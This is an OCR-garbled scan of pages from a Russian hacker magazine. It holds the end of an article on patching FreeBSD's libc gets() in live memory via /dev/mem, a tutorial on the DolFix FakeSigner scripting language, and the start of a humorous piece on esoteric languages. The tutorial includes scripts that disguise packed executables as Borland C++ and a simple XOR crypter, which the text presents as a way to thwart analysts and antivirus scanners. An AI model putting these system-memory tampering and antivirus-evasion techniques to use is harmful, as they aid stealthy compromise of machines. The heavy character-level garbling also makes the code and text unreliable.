функции деіз выглядят так: 556 896 Е56 576 566 536 836 
ЕС 6 2С6 8ВЬ 756 086 Е86 АС 6 406 ЕВ6. 

Открываем /деѵ/тет в бехебііог'е ($ бехебіі /беѵ/гпегп), 
давим <СігІ-3> (зеагсб) и вводим эту последователь- 
ность без суффикса 6 и без пробелов: «5589Е55756538 
ЗЕС2С8В7508Е8АС4ОЕВ». Редактор подумает немного 
и выдаст результат. У мыщъх'а функция деіз обнажи- 
лась в памяти по адресу: 6ВА8Е606. Это — физичес- 
кий адрес, и он непостоянен. Данная страница может 
многократно вытесняться из памяти и загружаться по 
совершенно другим адресам. 

Нажмем <СігІ-3> еще раз, чтобы убедиться, что данное 
вхождение было единственным. Если искомая после- 
довательность присутствует в памяти по нескольким 
адресам, то это значит, что либо произошла коллизия 
(совпадение с другой функцией), и тогда искомую пос- 
ледовательность необходимо удлинить еще на несколь- 
ко байт, либо в память загружено несколько библиотек, 
содержащих одну и ту же реализацию функции деіз 
(или библиотека, экспортирующая деіз, попала в дис- 
ковый кэш), и тогда нам нужно обратить внимание на 
младшие 3 байта. У нашей функции физические и вир- 
туальные адреса будут равны, поскольку адрес начала 
страницы всегда кратен 10006. Если же ни одного вхож- 
дения не найдено — функция деіз отсутствует в памяти 
(не загружена библиотека или страница вытеснена на 
диск), и тогда нам необходимо ее загрузить. 



Другая причина — искомая последовательность пере- 
секла границу страницы памяти, а, как мы уже гово- 
рили, порядок следования физических страниц не 
совпадает с виртуальным. В данном случае все хоро- 
шо: между началом де1з() и концом физической стра- 
ницы расположено РАѲЕ_5І2Е - (аіі(ігез_оІ_Іипс % РА6Е_ 
5І2Е) = 1000(1 - (4008СЕ601і%0х1 000) == 1А0(і байт, что более 
чем достаточно для поиска, но чтобы мы стали делать, 
если бы эта дистанция равнялась всего нескольким 
байтам?! А ничего — просто искали бы функцию в памя- 
ти не с начала самой функции, а с начала принадле- 
жащей ей страницы, то есть: і( (!тетстр(сіІ$ут(ІІЬ_пате, 
(ипс_пате) & ОхЕЕЕЕЕООО, ЬиІ_раде)). В этом случае нам 
достаточно, чтобы между началом функции и концом 
страницы было всего 5 байт, необходимых для внед- 
рения команды іитр Ібипк. А если этих байт нет? Тогда 
нужно искать следующую страницу и внедряться в сере- 
дину функции (но это самый тяжелый вариант, и здесь 
он не рассматривается) или ставить в начало функции 
СС6 и ловить исключение из ядра. 

Далее подготовим тестовую программу, которая будет 
вызывать функцию деіз. Один из вариантов реализации 
выглядит так: 



: . тестовая 

программа 

щ(ііІе(зІгстр(ЬиІ, "ехіі")) бегло. с используемая 

г ■■■ для экспериментов 

с функций деіз 



выходя из бех-редактора, откомпилируем ее (дсс бегло, 
с -о бегло) и запустим на выполнение (./бегло). 
Программа выполняется, как и положено, а именно: 
ожидает ввода с клавиатуры и выходит по «ехіі». Теперь 
изменяем первый байт функции на С36, сохраняем 
изменения по <Е2> и запускаем ./бегло еще раз. На 
этот раз функция деіз немедленно возвращает управ- 
ление, не обращая никакого внимания на клавиатуру, 
и экран заполняется стройными рядами точек. Ура! У 
нас получилось! 

Модификация де1з() воздействует как на уже запущен- 
ные, так и на впоследствии запускаемые процессы, 
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ШІХОЮ 



это нѳ звездное 
небо и не матрица, 
это — результат 
успешного хака 
функции деіз 
под РгееВЗР 



■ 



причем процессу очень сложно обнаружить, что его 
хакнули! Примечание: если деІз() уже находится в ожи- 
дании ввода, то замена 55Н на СЗИ не приводит к немед- 
ленному выходу из функции, и результат будет заметен 
только при ее следующем вызове. 

Но насколько это надежно? Что произойдет, если моди- 
фицированная страница в результате нехватки памя- 
ти отправится в изгнание, или какой-нибудь процесс 
попытается загрузить хакнутую библиотеку еще раз? 
Гарантирует ли операционная система непротиворечи- 
вость ситуации? Документация (см. «тап тет») не дает 
ответа на поставленный вопрос, и это правильно, пос- 
кольку модификация страниц отслеживается не самой 
операционной системой, а процессором. При любой 
записи в страницу (не важно, каким путем она произош- 
ла, — хоть инструкцией тоѵ, хоть через /беѵ/тет), 
процессор устанавливает бігіу-флаг, сообщая ОС, что 
при вытеснении страницы ее следует сбрасывать на 
диск. Специального обработчика для поддержки «хак- 
нутых» страниц нет, они обрабатываются так же, как 
остальные (как нам надо). Никакой процесс не может 
«перезагрузить» хакнутую библиотеку, поскольку ОС 
не видит никакой необходимости считывать с медлен- 
ного диска то, что уже находится в оперативной памяти. 
Можно предположить, что, если все процессы выгрузят 
модифицированную библиотеку, спустя какое-то время 
операционка действительно выбросит ее из памяти и 
при повторной загрузке начнет дергать диском. Тогда 
наш хак пойдет лесом, но эта ситуация маловероятна. В 
любом случае ей можно противостоять путем перехвата 
сІІсІозеО. 

Объединив все вышесказанное, нам по силам реали- 
зовать автоматический патчер, внедряющий любой 
код в произвольные функции (предлагаемый мыщъх'ем 
исходный код автоматического перехватчика, внедряю- 
щего в начало функции де(з() команду геіп, ты найдешь 
на прилагаемом к журналу диске, из-за ограничения по 
объему мы не можем его опубликовать. — Прим. ред.). 
Несколько замечаний к данной программе: для умень- 
шения количества коллизий и ускорения поиска срав- 
нение ведется с привязкой к смещению внутри стра- 
ницы (за это отвечает конструкция раде_Ьи![((ипзідпесІ 
іп()р)%РАСЕ_$І2Е]). Загрузка страниц в память про- 
исходит автоматически за счет работы тетстр(). 
Специально беспокоиться об этом не надо. Программа 
обрабатывает ситуации, когда искомая последователь- 
ность встречается в памяти более одного раза или 
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редактор Нехесііі 
нашел функцию 
деіз по ее сигнатуре 



«разрезается» страницей напополам. В этом случае 
она советует увеличить/уменьшить константу МІ!\І_5Ѳ_ 
ЗІ2Е, отвечающую за размер сигнатуры, и повторить 
попытку еще раз. 

Компилируем программу (дсс тет. с -02 -о тет -161) 
и запускаем ее на выполнение. Первый ключ коман- 
дой строки — имя библиотеки, второй — имя функции, 
которую нужно хакнуть. При запуске без аргументов 
хачится функция деіз из библиотеки ІІЬс.зо.6. Если в 
начале функции уже стоит СЗН, то программа пытается 
восстановить стандартный пролог и пишет 55Ь, то есть 
работает, как триггер (попытка хака функции с нестан- 
дартным прологом закончится плачевно). 

Продолжение следует... 
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Язык 

протектора 

Защищаем и просто ковыряем РЕ-файлы 
с помощью скриптового языка протектора 
Оо(Ріх РакеЗідпег 



ЕЩЕ СО ВРЕМЕН ДОСА СИС- 
ТЕМЩИКИ ПРИВЫКЛИ АВТОМА- 
ТИЗИРОВАТЬ СВОЮ РАБОТУ. 
КТО-ТО ПИШЕТ БАТНИКИ, КТО- 
ТО ЗАБИВАЕТ ЗАДАЧИ В КРОН, 

А У КОГО-ТО СВОЙ СОФТ ПОД 
ЭТО ДЕЛО. ЭТО ПОРОЙ НЕ РАЗ 
ВЫРУЧАЕТ, ЧТО НИ ГОВОРИ. НО 
ВОТ ЧТО ДЕЛАТЬ РЕВЕРСЕРАМ 
И КОДЕРАМ? КАК ЗАЩИТИТЬ 
КОД? КАК АВТОМАТИЗИРОВАТЬ 
РУТИННЫЕ ЗАДАЧИ, ТАК ИЛИ 
ИНАЧЕ СВЯЗАННЫЕ С РЕ-ФОР- 
МАТОМ? ЧИТАЙ. 




Как ты уже понял, рассматривать мы будем 
автоматизацию не простых операций, а 
реверсерских и кодерских, причем примени- 
тельно к ЕХЕ-файлам, так как насчет авто- 
матизации бокалов и прочей мелкой работы 
многие, наверное, для себя уже давно опре- 
делились с инструментами. Речь у нас пойдет 
о скриптовом языке ОоІРІх Зсгірі, входящим 
в состав протектора ОоІРІх РакеЗідпег (кста- 
ти, офигенной штуки. — Прим. Горлума). 
Прежде чем углубляться в возможности 
этого языка, поговорим немного о том, что 
же нужно реверсерам и тем, кому необхо- 
димо защитить свой софт. Средств автома- 
тизации для них не много, все таят в себе 
какие-то неприятные нюансы и сложности. 
Порой проще понять стандартный язык про- 
граммирования вроде бейсика или дельфей 
и автоматизировать на нем, чем учить чей-то 
корявый скриптовый язык. Здесь все же во 
многом соглашусь: проще реализовать зада- 
чу на первоисточнике. Но вот когда речь идет 



о работе с РЕ-файлами, тут уже стандартные 
языки не столь дружелюбны. Простой скрам- 
блер ІІРХ или средство смены имен секций 
потребует немалых знаний РЕ-формата, а 
если еще к тому же нет заголовков и прото- 
типов нужных структур и функций — вообще 
беда. И простая, по мерам реверсера, зада- 
ча может затянуться на несколько дней. Но 
не все так плохо, как может показаться. С 
подобными проблемами сталкивался и автор 
данного материала и в свое время напи- 
сал довольно мощный скриптовый движок, 
о котором было написано выше. Данный 
скриптовый язык позволяет автоматизиро- 
вать решение практически любых задач по 
работе с РЕ-файлами. Многие пользовате- 
ли протектора ОоІРІх РакеЗідпег даже и не 
задумываются о том, что в его состав вхо- 
дит такое мощное средство автоматизации. 
Остальные же не изучают по одной простой 
причине: практически нет готовых примеров, 
а следовательно, и стимулов к изучению. В 



этой статье я постараюсь исправить это упу- 
щение и рассмотреть на конкретных приме- 
рах функционал данного языка. 

ОСНОВНЫЕ КОМАНДЫ ЯЗЫКА 

Рассмотрим основной набор команд языка. 
Начнем со «строково-математических» фун- 
кций: 

аеі <ѵаІие>, <асоитиІа(ог> 

Первый операнд команды веі — числовое или 
символьное значение, второй — аккумулятор 
(переменная), в которую будет занесено это 
значение. По сути, команда на понятном чело- 
веку языке выглядела бы так: асситиіаіог = 
ѵаіие. Соответственно, для сложения, вычита- 
ния и других операций с числовыми данными 
используются следующие команды: 

ас)с1 <ѵаІие 1 >,<ѵаІие 2>, <асситиІаІог> 

$иЬ <ѵа!ие 1 >,<ѵа!ие 2>, <асситиІа(ог> 
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тиі сѵаіие 1 >,<ѵаІиѳ 2>, <асситиІаіог> 
сііѵ <ѵаІие 1 >,<ѵаІие 2>, <асситиІаІог> 

Логично предположить, что ѵаіие 1 и ѵаіие 2 
представляют собой первое и второе число, 
а асситиіаіог — переменную для сохранения 
результата. Разумный вопрос: а как исполь- 
зовать переменные в ѵаіие 1 и 2? Легко! 
Переменную указываем в макросовом виде. 
Пример: имеем переменную «а», в которой 
хранится число 10, и переменную «Ь», в кото- 
рой хранится число 20, тогда конструкция 

асісі @а@@Ь@,150,с 

выполнится так: «а» приложится к «Ь» и 
составит 1020, а к этому числу нужно при- 
бавить 150. В результате в переменной «с» 
будет 1020+150, то есть 1170. Думаю, мето- 
дика понятна. 

Ниже представлю некоторые другие коман- 
ды для работы со строками, прототипы кото- 
рых описаны в справке к программе: сопсаі, 
сбгіобех, бехіосбг, зибзіг, Іепдіб, сгеаіезігіпд, 
гпбЬуІе, зеііосіірбоагб. Имена команд интуи- 
тивно понятны и легко запоминаются, поэто- 
му проблемы не должны возникнуть. Если и 
возникнут — далее язык будет рассмотрен на 
примерах. 

Со строками закончили, пора перейти к 
командам ввода/вывода, предназначенных 
для общения разрабатываемого нами супер- 
скрипта с пользователем. Весь ввод и вывод 
производится либо через формы запроса, 
либо через консоль. Вот основные команды: 

теззадеЬох <соп!еп1з>, <теззаде сосІе>, <1і11ѳ>, 
<асситиІаіог> 

Аналог одноименной АРІ, только последний 
параметр — результат, возвращаемый функ- 
цией и описывающий, что за кнопку нажал 
юзер для контроля результата. 

іприІЬох <риез!іоп>, <асситиІа(ог> 

Форма запроса данных от пользователя: 
диезііоп — текст вопроса, асситиіаіог — имя 
переменной, в которую будут занесены вве- 
денные пользователем данные. 

— сопзоіе.іоасі <1ех1> грузит консоль с заголов- 
ком Іехі. 

— сопзоіе.ипіоасі выгружает консоль. 

— сопзоіе.ргіпі <1ех1> выводит Іехі на консоль. 

— сопзоіе.деі <асситиІаіог> запросит строку у 
юзера. Как только он ее введет, скрипт про- 
должит выполнение команд. Асситиіаіог- 
переменная будет содержать введенные дан- 
ные. 

— сопзоіе.соіог <1огесоІог>, <ЬасксоІог> изменяет 
палитру, с которой будет выведена строка, 
командой сопзоіе.ргіпі. Исключительно для 
украшения интерфейса. 

— сопзоІе.аІІгіЬиІез <аІгіЬиІез> меняет атрибуты 
консоли (сделано лишь для полной реализа- 



ции консольных команд). 

Для работы с реестром используются команды: 

гедізігу.зеі <кеу>, <раІИ>, <рагате1ег>, <ѵа!ие> 
гедізігу.деі <кеу>, <раІІі>, <рагате1ег>, <асси- 
тиІа!ог> 

Пригодятся, если скрипт имеет настройки, 
которые нужно один раз установить и больше 
не вводить. Если же іпі-файл ближе, то можно 
использовать: 

іпі.зѳі <кеу>, <зиЬкеу>, <ѵаІие> 
іпі.деі <кеу>, <зиЬкеу>, <асситиІа(ог> 

Если нужно приостановить выполнение команд 
на несколько секунд, то можно использовать 
команду раизе <тіІІІзесопсІз> для воспроиз- 
ведения музыки. РІау <ѵѵаѵ ІІІе>, хоть не хт, 
но все же сгодится. Для выхода из программы 
следует использовать команду ехіі. Если же 
ты спецкодер, то ты будешь счастлив, узнав 
что в скрипте есть возможность использовать 
АРІ-функции: 

Іоаіііипсііоп <1ипсІіоп патѳ>, <раІЬ Іо <1ІІ>, <рагат1>, 
<рагат2>, <рагатЗ>, <асситиІаІог> 

Да, параметров только 3, но это максимум, 
который можно выжать из динамической 
загрузки, если не считать азт-вставки. Как и 
в любом нормальном языке, можно использо- 
вать метки и делать на них переходы: 

ІаЬеІ <ІІІІе> — создать метку ІІІІе 
доіо <ІаЬеІ> — перейти на метку ІаЬеІ 

Напоследок я оставил команды для работы с 
файлами непосредственно РЕ-формата и не 
только. Именно они пригодятся при защите 
твоей программы. Вот они: 

— ЬеКІІе <ІІІепате> удаляет файл с именем 
ІІІепате. 

— соруіііе <(ІІепате (гот>, <(ІІепате 1о> копирует 
файл ІІІепате Ігот в файл ІІІепате Іо. 

— асісііод <(ІІепате>, <5Ігіпд> добавляет в файл 
ІІІепате строку зігіпд (рекомендуется исполь- 
зовать для ведения логов работы скрипта). 

— зЬеІІ <ІІІепате> запускает ЕХЕ-файл. 

— риісосіе < 0 І(зеІ>, <НЕХ_51иЬ> пристраивает по 
смещению оіізеі, записанный в НЕХ-виде, 
набор байт. 

— деісосіе <о(ІзеІ>, <ІепдІІі>, <асситиІаІог> считы- 
вает в аккумулятор последовательность байт 
длиной Іепдіб по смещению оіізеі. 

— деКІІе <асситиіаІог> считывает все содержи- 
мое файла в аккумулятор. 

— деііііеіепдііі <асситиІа(ог> считывает длину 
файла в аккумулятор. 

— деіоет <асситиіаІог> считывает ОЕМ-инфор- 
мацию из 003-заголовка ЕХЕ-файла. 

— зеіоет <1ех1> записывает ОЕМ-информацию 
в сІоз_ІіеасІег. Рекомендуется юзать это поле 
для каких-то своих записей типа Раісбеб Ьу 




Если у тебя есть какое-нибудь предложение 
по расширению команд скриптового движ- 
ка — смело пиши мне на мыло. Не забывай 
присылать скрипты, которые напишешь сам, я 
обязательно выложу их на сайте программы. 

ДоНп ЗтіІІтоп в обрабатываемом РЕ-файле. 

— деіоер <асситиІаІог> считывает адрес точки 
входа в аккумулятор. 

— зеіоер <Иѳх зігіпдь изменяет адрес точки 
входа в программе на ту, что записана в НЕХ- 
виде в бех зігіпд. 

— сгеаіезесііоп <пате>, <зІ 2 в>, асситиіаіог (ІІІе 
оІ(зеІ)>, асситиіаіог (ѵігіиаі асісІгез5)> создает в 
файле новую секцию с именем пате и раз- 
мером зіде. При этом смещение секции в РЕ- 
файле и виртуальный адрес сохраняются в 
соответствующих аккумуляторах. 

— зеІІІад <Мех з1гіпд> ставит флаг бех зігіпд на 
все секции. 

— іпѵегі <Ьех зігіпд (8 ЬуІез)>, <асситиІаІог> меняет 
местами байты (требуется для ризб’ей, саіі’ов 
и других инструкций). Пример: был адрес 
00401011, в аккумуляторе после инвертиро- 
вания — 1 1104000. Перед этим числом ставим 
Е8 и получаем относительный ]тр, который 
можно записывать в файл. 

— деІітадеЬазе <асситиІа(ог> получает Ітаде Вазе. 

— хогсобе <оІ(зеІ>, <1епд11і>, <асситиІаіог> хог’ит 
<ІепдІб> байт по смещению <оІІзеІ> и зано- 
сит код декодера в асситиіаіог. 

— сгеаіераііі <раІИ> создает путь из неограничен- 
ного числа каталогов или просто одну папку. 

Последнее, что хотелось бы отметить, — 
после любой команды в самом конце можно 
поставить запятую и написать ІІ <ѵагіаЫе> = 
<зоте ІехІ>, где ѵагіаЫе — имя переменной, а 
зоте Іехі — то, чему переменная может быть 
равна (кстати, помимо «=», можно использо- 
вать и «>» и «<»). При этом команда выпол- 
нится только при равенстве переменной тек- 
сту. Вот пример: 

теззадеЬох Ро уои иапЬ Іо раісЬ ргодгат?, 4, РаІсЬ, 
геіѵаі 

Если пользователь нажмет на кнопку Уез: 

теззадеЬох Уои зеіесі Уез, 1 6, Уез, геіѵаіі , ІІ геіѵаі = 6 

Если пользователь нажмет на кнопку N 0 : 

теззадеЬох Уои зеіесі Мо, 16, N 0 , ге1ѵаі2, ІІ геіѵаі = 7 

Теперь, когда с языком разобрались, попро- 
буем на примерах. 

МАСКИРУЕМ ЕХЕ-ФАЙЛ ПОД 
ВОПІ.АИО С++ 1999 

Довольно интересно упаковать ЕХЕ-файл, 
скажем, ІІРХ’ом или АЗРаск’ом, да чтоб при 
этом РЕЮ и другие сниферы думали, что это 
непакованный файл, скомпиленный в бор- 
ландовом С++. Тут и крэкеры будут смущены 
немного, и эмулятор команд сглючит в неко- 
торых эмулирующих отладчиках. Короче, 
довольно полезная штука. Сейчас попробуем 
ее реализовать. 

Определимся с планом работы. Именно с 
планом, а не алгоритмом. Сначала нам потре- 
буется сформировать сигнатуру — это будут 
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первые байты с ОЕР нормальной ВогіапсІ С++ 
программы, затем нужно выровнить стек и 
очистить регистры, если они менялись этим 
кодом, и перейти на оригинальную точку 
входа. Нашу сигнатуру, сформированную по 
указанному выше плану, необходимо вставить 
в последнюю секцию и поменять ЕР на нее. А 
вот и примерный алгоритм реализации этого 
на ЭоІРІх Зсгірі’е. 

;спросим у юзера, нужно ли патчить 
теззадеЬох бо уои «апі Іо раІсЬ ІЬІз ргодгат?, 4, 
Раісіі, геіѵаі 

;если не нужно — выходим 
доіо ехіі , і( геіѵаі = 7 
;узнаем ЕР 
деіоер оер, ѵа_оер 
;узнаем ітаде Ьазе 
деіітадеЬазе ітадеЬазе 
;объединяем 

абб @ѵа_оер@,@ітадеЬазе@,ѵа_оер 
;инвертируем этот адрес 
іпѵегі @ѵа_оер@, ѵа_оер 

;узнаем длину генерируемой сигнатуры <сигнатура> 
;<прыжок на 0ЕР> 

ІепдІІі ЕВ1 066623А432В2В484Р4Р4В90Е900000000 
А1 00000000С1 Е002А3000000005290В8@ѵа_оер@ 
РРЕО.Іеп 

;создаем секцию длиной с длину сигнатуры 

сгеаіезесііоп сооі, @Іеп@, гам/, ѵа 

;определяем рандомный адрес, чтобы смутить 

;анализаторы, чтобы сигнатура не была статичной 

абб @ѵа@,@ітадеЬазе@,аббгезз 

;инвертируем этот адрес 

іпѵегі @аббгезз@, аббгезз 

вставляем сигну в созданную секцию 

риісобе @га»@, ЕВ1066623А432В2В484Р4Р4В90Е90 

0000000А1 @аббгезз@С1 Е002АЗ@аббгезз@5290В8@ 

ѵа_оер@РРЕО,Іеп 

;меняем ЕР на адрес новой секции 
зеіоер @ѵа@ 

устанавливаем флаги секций в С0000020 
зеіііад С0000020 

;выводим новую точку входа на экран 
теззадеЬох Меи оер: @ѵа@,16 
ІаЬеІ ехіі 

ОПРЕДЕЛЯЕМ ПИКОДОВОСТЬ 
ѴВ-ПРОЕКТА 

Очень часто реверсеру приходится иметь 
дело с программами, написанными на Ѵізиа! 
Вазіс. Полезно заранее знать, псевдокод там 
или нормальный машинный. Это бы упрос- 
тило скорость подбора инструмента для 
исследования в несколько раз. Раскрою тебе 
небольшой секрет: если иметь под рукой 



ОоіЕіх Зсгірі, то задача решается минут за 10. 
Сомневаешься? Тогда давай напишем с тобой 
такой скрипт и разберем, как он работает: 

деіоер оер, ѵа_оер 

деіітадеЬазе ІтадеЬазе 

абб @ѵа_оер@,@ітадеЬазе@,ѵа_оер 

абб @оер@,1 ,оер 

деісобе @оер@, 4, ѴВНеагіег 

іпѵегі @ѴВНеабег@, ѴВНеабег 

зиЬ @ѴВНеабег@,@ітадеЬазе@, ѴВНеабег 

абб @ѴВНеабег@, 30, ѴВНеабег 

деісобе @ѴВНеабег@, 4, Ргоіесііпіо 

іпѵегі @Рго]есІІпіо@, Ргоіесііпіо 

зиЬ @РгоіесІІпІо@,@ітадеЬазе@, Ргоіесііпіо 

абб @РгоіесІІпіо@, 20, Ргоіесііпіо 

деісобе @РгоіесИп(о@, 4, ІЧаііѵеСобе 

теззадеЬох ТЬІз ргодгат сотрііеб Іо Р-Согіе,64,ѴВ 

(ІІе зпіНег, геіѵаі, ІІ ЫаІіѵеСосІе = 00000000 

теззадеЬох ТЬІз ргодгат сотрііеб Іо Маііѵе 

Собе,64,ѴВ (ІІе зпіНег, геіѵаі, ІІ ІЧаііѵеСобе > 00000000 

Как видишь, скрипт очень прост. Решение той 
же задачи на Си потребовало бы втрое боль- 
ше времени, не говоря уже о том, что потребо- 
валось бы позаботиться о пользовательском 
интерфейсе и прочих рутинных операциях, 
которые за нас выполняет скриптовый движок 
и сам ОоІЕІх ЕакеЗідпег. От нас остается толь- 
ко объяснить ему, что делать с уже открытым 
файлом. Задачи корректно закрыть файл и 
т.п. также целиком и полностью ложатся на 
скрипт. 

Теперь рассмотрим только что написанный 
код. Сначала мы в нем считываем адрес 
ѴВНеабег структуры, по этому адресу считы- 
ваем саму структуру, а затем по смещению 
ЗОИ относительно начала структуры считы- 
ваем поле Ргоіесііпіо. Оно, в свою очередь, 
указывает на соответствующую структуру 
Ргоіесііпіо. По смещению 20И уже относи- 
тельно начала Ргоіесііпіо структуры считы- 
ваем 4-байтное поле ІМаііѵеСосіе. Если оно 



отлично от нуля, то мы имеем ІМаііѵе Собе 
программу, если иначе, то это — пикод. Так 
как Эѵѵогб-поля расположены в ЕХЕ-файле в 
формате справа на лево, то мы их все приво- 
дим к нормальному отображению командой 
іпѵегі. Затем эти адреса необходимо пере- 
вести в ОНзеІ, для этого мы отнимаем из них 
ІтадеВазе. Признаюсь честно, что для более 
корректного перевода надо скорректировать 
это число по ОНзеІ и ѴА-адреоам секции, в 
которой находится адрес, но в ѴВ-программах 
эти адреса у первой секции обычно всегда 
равны, поэтому я решил не усложнять скрипт 
лишними операциями. 

ПИШЕМ ПРОСТЕНЬКИЙ КРИПТОР 

Теперь, когда мы немного разобрались с 
командами скриптового языка, я думаю, имеет 
смысл написать что-нибудь гораздо более 
серьезное. Я предлагаю написать криптор РЕ- 
файлов. Он будет криптовать первые 10 байт 
в ЕХЕ-файле, начиная от точки входа, а точка 
входа будет меняться на последнюю секцию. 
В нее мы запишем декриптор того участка из 
10 байт и, соответственно, переход на ориги- 
нальную точку входа в программу. В простей- 
шем виде скрипт будет выглядеть так: 

определяем точку входа 
деіоер оер, ѵа_оер 

;хог’им первые 10 байт точки входа и 

;заносим код декриптора в переменную бесобег 

хогсобе @ѵа_оер@, 10, бесобег 

Определяем ІтадеЬазе 

деіітадеЬазе ІтадеЬазе 

Окладываем оер и ІтадеЬазе 

абб @ѵа_оер@,@ітадеЬазе@,ѵа_оер 

;записываем байты в обратном порядке 

іпѵегі @ѵа_оер@, ѵа_оер 

;заносим длину нашего кода в переменную Іеп 

ІепдІЬ 60@бесобег@61 В8@ѵа_оер@ЕРЕ0,Іеп 

ооздаем секцию с именем сооі и длиной Іеп 

функция занесет реальный и виртуальный адреса 

;в переменные га* и ѵа. 

сгеаіезесііоп сооі, @Іеп@, гаи, ѵа 

оставляем код в ЕХЕ-файл по адресу, 

;который содержится в переменной га» 

риісобе @га«@, 60@бесобег@6168@ѵа_оер@ 

Е800000000СЗСЗ 

озменим оер на адрес начала нашего кода 



ПАРА ОТОВ ОБ ОТДАЛИ 



Ходят слухи, что последующие версии ѴѴіпсіоѵѵ.ч запретят прикладному 
коду присваивать все три атрибута РАСтЕ_ЕХЕСХ1ТЕ_ЯЕАП\УЯ1ТЕ 
одновременно, поскольку реально это нужно только зловредному коду. 
Это сможет делать только система или администратор. Поэтому перед 
копированием необходимо присвоить атрибуты Р АС т Е_ Я Е А 1 АѴЯІ ТЕ, 
и только после — РАСЕ ЕХЕСИТЕ. 
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;в созданной секции 
зеіоер @ѵа@ 

разблокируем возможность записи в секции 
зеШад С0000020 
;выведем на экран сообщение 
теззадеЬох Ией оер: @ѵа@,64 

Как видишь, то, что пишут Си-кодеры целый 
день и отлаживают неделю, мы в состоянии 
наколбасить за полчаса, включая время 
отладки. Ладно, это мы отвлеклись. Как же 
работает скрипт? Все просто! Определяем 
точку входа и ксорим первые 10 байт, 
затем копируем дескриптор в переменную 
бесобег. Создаем новую секцию и добав- 
ляем туда декодер и переход на ОЕР. Если 
тебя смутила запись «60@бесобег@61 68@ѵа_ 
оер@Е800000000СЗСЗ » , то объясняю: 

60 — опкод команды ассемблера ризбаб 

61 — опкод команды ассемблера рораб 
68@ѵа_оер@ — ризб @ѵа_оер@ 

Е800000000 — ризИ 0 

СЗ - геі 

Этот извратный ітр используется в некоторых 
протекторах для того, чтобы скрыть переход. 
Вот и все, что я хотел тебе рассказать. 
Немного практики и, вероятно, ты будешь 
оптимизировать с помощью данного скрипто- 
вого языка многие свои (и не свои) задачи по 
обработке РЕ-файлов. 

ИСПОЛЬЗОВАНИЕ СКРИПТОВ 

Ну вот, написал ты скрипты, поставил пос- 
леднюю команду и первая твоя мысль: а куда 
это вое класть? И правда. О самом главном 
я так и не сказал. Все скрипты необходимо 
сохранять в таком формате: «<имя скрипта>. 
Ііх». Теперь полученный нами скрипт копиру- 
ем в папку 8сгір(з. Она находится в той папке, 
в которую ты установил ЭоІРІх РакеЗідпег 
(если еще не установил — вставляй ту 
круглую хренотень, что валялась в пакете 
вместе с журналом, в корпус или открывай 
бНр://1акезідпег.бо{1іх.пе1 ). 

Теперь самое время запустить ЭоІРІх и выбрать 
любой ЕХЕ-файл, затем в списке скрип- 
тов выбрать нужный и нажать кнопку Раісб. 




сайт программы, за обновлениями — 
сюда 




I Щ 

Протекторов и упаковщиков 
нынче множество, при этом 
все время появляются новые. 
Вместе с ними появляются ути- 
литы для распаковки и снятия 
всех новоявленных защит. Как 
обычно. Как же быть? Надо же 
защитить свой код! От анализа 
человеком или антивирусом — 
неважно, надо уметь протектить 
файлы по-своему. Так, чтобы 
всякие распаковщики и утилиты 
все свои противные зубки пооб- 
ломали. Но писать протектор 
самому — это огромная работа. 
Теперь я знаю другой отличный 
способ — НогРіх Ба1се$і§пег. 

НИКОЛАЙ С, О III. 



Скрипт начнет выполняться. Рекомендую во 
всех скриптах вначале писать запрос у поль- 
зователя, а то вдруг он не по ошибке запустил 
скрипт. Это, так сказать, правило хорошего 
тона. Рекомендуется в скриптах предусматри- 
вать бэкап исходного файла и возможность 
его восстановления в случае ошибки скрипта 
(для этого подойдут команды соруіііе и беІІІІе). 
Советую предусмотреть консольный интер- 
фейс и возможность сохранения предпочте- 
ний юзера в реестр. Соблюдая эти советы, 
можно написать действительно невероятно 
удобный скрипт. 




дебаггер сразу просек все ошибки в 
скрипте 




Свежую версию РоІРІх РакеЗідпег, а также 
другие, написанные мной программы, ты 
можешь найти вот тут: МНр:/Аллл/цу.бо11іх.пе1/ 




На диске лежат все скрипты, представленные 
в статье, а также РоІРІх РакеЗідпег, под кото- 
рый скрипты и пишутся. 



ХОЧУ КОМПИЛЯТОР 

Разобравшись со скриптовым языком, ты 
наверняка напишешь что-нибудь мощное, 
новое, продвинутое. И у тебя возникнет воп- 
рос: а нельзя ли этот скрипт превратить в 
нормальный РЕ-экзешник, независимый от 
ЕакеЗіпдег'а? Обрадую тебя, над этим вопро- 
сом автор уже работает, и, думаю, в одной из 
ближайших версий ЭоІЕІх РакеЗідпеГа поя- 
вится компилятор скриптов в ЕХЕ-файле. Так 
что можешь уже начинать писать свой супер- 
скрипт! А если не хватает команд — пиши 
мне, буду расширять язык нужными операто- 
рами и командами. 

ВІНДКѴ ѴОШѴ5 ЛИ 




РЕЮ даже на погтаі зсап'е наивно верит, 
что это — С++ 
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СООІЫО 




ТЕХТ НИКОЛАЙ ѲОВІ_ АНДРЕЕВ 

/ СОШ_1Ш@ПЕАІ_.ХАКЕР.КІІ / 



Обезьяний кодинг 

Немного оффтопика об эзотерических языках 
программирования 



— Когда я был маленьким, — задумчиво проговорил он, 

— я увидел в одной книжке изображение чудесника. Он 
стоял на вершине горы, размахивал руками, и волны 
поднимались прямо к нему, как это бывает в Анкокой 
бухте в шторм. 

Повсюду сверкали молнии... 

— У-ук? 

— Я откуда знаю, может, он носил резиновые сапоги, 

— рявкнул Ринсвинд, а затем мечтательно продолжил: 

— Еще у него были посох и шляпа, совсем как моя, и 
глаза его вроде как светились, а из кончиков пальцев 
исходило вот такое сверкание. Тогда я подумал, что в 
один прекрасный день сделаю то же самое и... 

— У-ук? 

— Ладно, уговорил, мне половинку. 

— У-ук. 

— Интересно, а чем ты расплачиваешься? Каждый раз, 
когда тебе дают деньги, ты их съедаешь. 

— У-ук. 

— Потрясающе. 



«Посох и шляпа». Терри Пратчетт. 




Если у тебя есть знакомые обезьяны, то я 
знаю, чем ты их можешь удивить, помимо 
банального желтого плода, героя порнофиль- 
мов, на котором всю жизнь поскальзывают- 
ся всякие задроты. Вообще, обезьяны — это 
достаточно грубое, даже можно сказать соци- 
ально-агрессивное обобщение, такое же, как 
и «наркотики» или «хакеры». В данном кон- 
кретном случае я имею в виду только оран- 
гутангов. На базе их, как ты, наверное, уже 
заметил, несложного диалекта был построен 
замечательный своей абсолютной беспо- 
лезностью язык программирования. Вполне 
рабочий язык, между прочим. В нем можно 
манипулировать только у-ук'ами, которыми 
так понятно объяснялся пратчеттовский биб- 
лиотекарь, в результате несчастного случая 
превращенный в орангутанга, и совершенно 
не желавший возвращаться в свое человечес- 
кое обличив (еще бы, одно дело — человек, 
другое — 150-килограммовая рыжая бестия). 
Собственно, в языке всего 3 синтаксических 
